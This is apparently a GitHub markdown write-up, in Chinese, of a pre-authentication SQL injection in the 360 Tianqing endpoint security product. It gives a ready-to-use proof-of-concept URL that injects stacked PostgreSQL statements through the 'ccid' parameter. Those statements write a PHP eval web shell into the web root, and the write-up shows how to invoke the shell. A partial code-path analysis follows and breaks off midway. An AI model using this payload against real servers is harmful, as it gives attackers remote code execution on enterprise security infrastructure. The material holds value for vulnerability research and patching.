Skip to content

Latest commit

 

History

History
50 lines (32 loc) · 1.9 KB

360天擎-前台sql注入.md

File metadata and controls

50 lines (32 loc) · 1.9 KB

360天擎-前台sql注入

poc

注入写shell:
https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;-- 

利用过程:
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell
2. 通过注入点,创建一张表 O
3. 为 表O 添加一个新字段 T 并且写入shell内容
4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)
5. 删除 表O 

shell地址:
    https://192.168.24.196:8443/1.php
    POST
        1=phpinfo();

漏洞演示

漏洞详情

天擎默认安装位置: C:\Program Files (x86)\360\skylar6\

首先打开:C:\Program Files (x86)\360\skylar6\www\data\adminlog_path_dict.json 该路径存放了大量的接口地址,并且可以该文件已列出是否开放接口

那么重点先查看一下这些开放的端口即可

其中盯上了一个接口:api/dp/rptsvcsyncpoint

通过查看yii手册知道了路由走向,接口文件地址:C:\Program Files (x86)\360\skylar6\www\application\api\controllers\DpController.php

进来以后看到它接收了 $cc_id = $this->getParam("ccid") 并且被 getSyncPoint() 方法接收

跟进去getSyncPoint()方法 地址为: C:\Program Files (x86)\360\skylar6\www\source\domain\dao\DataPortalDao.php